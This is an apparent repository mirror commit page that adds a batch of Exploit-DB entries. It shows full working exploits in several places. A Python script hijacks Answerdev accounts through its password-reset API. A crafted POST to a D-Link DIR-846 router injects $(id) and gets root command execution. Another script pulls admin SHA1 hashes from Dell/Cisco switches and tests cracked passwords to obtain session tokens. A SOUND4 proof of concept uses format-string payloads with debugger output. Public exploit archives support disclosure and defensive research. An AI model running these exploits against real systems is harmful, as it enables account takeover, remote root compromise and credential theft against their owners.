bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-06

Browse source 
32 changes to exploits/shellcodes/ghdb

Answerdev 1.0.3 - Account Takeover

D-Link DIR-846 - Remote Command Execution (RCE) vulnerability

Dell EMC Networking PC5500 firmware versions 4.1.0.22 and  Cisco Sx / SMB - Information Disclosure

SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow

ERPNext 12.29 - Cross-Site Scripting (XSS)

Liferay Portal 6.2.5 - Insecure Permissions

GNU screen v4.9.0 - Privilege Escalation

Apache Tomcat 10.1 - Denial Of Service

PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

BTCPay Server v1.7.4 - HTML Injection.

Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

ImageMagick 7.1.0-49 - DoS

bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)

Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)

Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)

CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)

Control Web Panel 7 (CWP7) v0.9.8.1147 -  Remote Code Execution (RCE)

Froxlor 2.0.3 Stable - Remote Code Execution (RCE)

ImageMagick 7.1.0-49 - Arbitrary File Read

itech TrainSmart r1044 - SQL injection

Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)

PhotoShow 3.0 - Remote Code Execution

projectSend r1605 - Remote Code Exectution RCE

Responsive FileManager 9.9.5 - Remote Code Execution (RCE)

zstore 6.6.0 - Cross-Site Scripting (XSS)

Binwalk v2.3.2 - Remote Command Execution (RCE)

XWorm Trojan 2.1 - Null Pointer Derefernce DoS

Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)

Linux/x86_64 - bash Shellcode with xor encoding
This commit is contained in:
Exploit-DB 2023-04-06 00:16:31 +00:00
parent d4e68dbb7e
commit d46ab98863
32 changed files with 2569 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
exploits/go/webapps/51257.py Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Answerdev 1.0.3 - Account Takeover
# Date: Reported on Jan 24th 2023
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp
# Vendor Homepage: https://answer.dev/
# Software Link: https://github.com/answerdev/answer
# Version: 1.0.3
# Tested on: Ubuntu 22.04 / Debian 11
# CVE : CVE-2023-0744
from sys import argv
import urllib3
from requests import post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def ato(url: list, email: str) -> str:
try:
return f"Your Link: {''.join(url)}users/password-reset?code=" + \
post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
except Exception as err:
return f"Cant reach URL: {err}"
if __name__ == "__main__":
if len(argv) != 3:
print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
exit()
print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))

87
exploits/hardware/remote/51243.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Google Dork: NA
# Date: 30/01/2023
# Exploit Author: Françoa Taffarel
# Vendor Homepage:
https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Software Link:
https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Version: DIR846enFW100A53DBR-Retail
# Tested on: D-LINK DIR-846
# CVE : CVE-2022-46552
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
parameter. This vulnerability is exploited via a crafted POST request.
### Malicious POST Request
```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```
### Response
```
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```
### Data from RCE Request
```
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```
### Response
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)
```

107
exploits/hardware/remote/51248.py Executable file
View file

@ -0,0 +1,107 @@
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability>
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle
import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) < 3:
print("Usage: python cve-2019-15993.py URL passwordfile")
sys.exit()
url = sys.argv[1]
file = sys.argv[2]
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def hash_value(value):
"""Calculate the SHA1 hash of a value."""
sha1 = hashlib.sha1()
sha1.update(value.encode('utf-8'))
return sha1.hexdigest()
def userName_parser(text, start_delimiter, end_delimiter):
results = []
iteration = 0
start = 0
while start >= 0:
start = text.find(start_delimiter, start)
if start >= 0:
start += len(start_delimiter)
end = text.find(end_delimiter, start)
if end >= 0:
results.append(text[start:end])
start = end + len(end_delimiter)
iteration = iteration + 1
return results
# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)
# Read in the values from the file
with open(file, 'r') as f:
values = f.readlines()
values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}
if response.status_code == 302:
print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
url = response.headers["Location"] + "config/device/adminusersetting"
response=requests.get(url, verify=False)
if response.status_code == 200:
print("[*] Successful request to URL:", url + "\n")
content = response.text
users_names = userName_parser(content,"<userName>","</userName>")
sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
print("SHA1 Hashes found:\n")
loops = 0
while loops < len(sha1_hashes):
print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")
for sha1_hash in sha1_hashes:
if sha1_hash in hashes:
print("Match:", sha1_hash, hashes[sha1_hash])
print("\nTesting Credentials via API.\n\n")
payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])
response_login = requests.get(payload, allow_redirects=False, verify=False)
headers = response_login.headers
if "sessionID" in headers:
print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
print(headers["sessionID"])
else:
print("Unable to sign in.")
loops = loops + 1
else:
print("Host is not vulnerable:", response.status_code)
[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]
Ken Pyle
M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
Main: 267-540-3337
Direct: 484-498-8340
Email: kp@cybir.com
Website: www.cybir.com

330
exploits/hardware/remote/51259.txt Normal file
View file

@ -0,0 +1,330 @@
# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow
# Exploit Author: LiquidWorm
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 1.1.2
Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that
allow users to remotely control SOUND4 processors through a network connection.
SOUND4 offers a tool that manage sending L&S commands to your processors:
the Link&Share Transmitter.
Desc: The application suffers from a format string memory leak and stack
buffer overflow vulnerability because it fails to properly sanitize user
supplied input when calling the getenv() function from MSVCR120.DLL resulting
in a crash overflowing the memory stack and leaking sensitive information.
The attacker can abuse the username environment variable to trigger and
potentially execute code on the affected system.
---------------------------------------------------------------------------
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29 int 29h
---------------------------------------------------------------------------
Tested on: Microsoft Windows 10 Home
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5744
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php
26.09.2022
--
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file
02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
---
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSVCR120!_invoke_watson+0xe:
645046b1 cd29 int 29h
0:000> kb
# ChildEBP RetAddr Args to Child
00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85]
02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96]
03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690]
04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138]
*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190]
WARNING: Stack unwind information not available. Following frames may be wrong.
06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
645046b1 cd29 int 29h
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 00000005
Subcode: 0x5 FAST_FAIL_INVALID_ARG
FAULTING_THREAD: 000059e8
DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG
PROCESS_NAME: LinkAndShareTransmitter.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 00000005
WATSON_BKT_PROCSTAMP: 6144495e
WATSON_BKT_PROCVER: 1.1.0.2
PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter
WATSON_BKT_MODULE: MSVCR120.dll
WATSON_BKT_MODSTAMP: 577e0f1e
WATSON_BKT_MODOFFSET: a46b1
WATSON_BKT_MODVER: 12.0.40660.0
MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013
BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5
MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143
ANALYSIS_VERSION: 10.0.16299.91 x86fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n270]
Type: [FAIL_FAST]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [Unspecified]
Frame: [0]
ID: [0n257]
Type: [INVALID_ARG]
Class: Addendum
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [Unspecified]
Frame: [0]
BUGCHECK_STR: FAIL_FAST_INVALID_ARG
PRIMARY_PROBLEM_CLASS: FAIL_FAST
LAST_CONTROL_TRANSFER: from 64504677 to 645046b1
STACK_TEXT:
0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe
0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a
0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc
0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49
0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81
0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16
WARNING: Stack unwind information not available. Following frames may be wrong.
0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
